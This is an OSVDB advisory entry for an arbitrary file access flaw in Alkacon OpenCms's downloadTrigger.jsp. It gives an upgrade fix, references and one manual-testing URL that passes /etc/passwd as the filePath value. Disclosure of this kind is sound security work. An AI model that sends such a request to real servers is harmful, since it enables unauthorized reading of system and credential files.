Alkacon OpenCms downloadTrigger.jsp filePath Variable Arbitrary File Access

2006-07-21T12:04:08
ID OSVDB:27551
Type osvdb
Reporter Meder Kydyraliev(bugtraq@web.areopag.net)
Modified 2006-07-21T12:04:08

Description

Solution Description

Upgrade to version 6.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd

References:

Vendor URL: http://www.opencms.org/ Secunia Advisory ID:21193 Related OSVDB ID: 27552 Related OSVDB ID: 27554 Related OSVDB ID: 27559 Other Advisory URL: http://o0o.nu/~meder/OpenCMS_multiple_vulnerabilities.txt Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0614.html CVE-2006-3934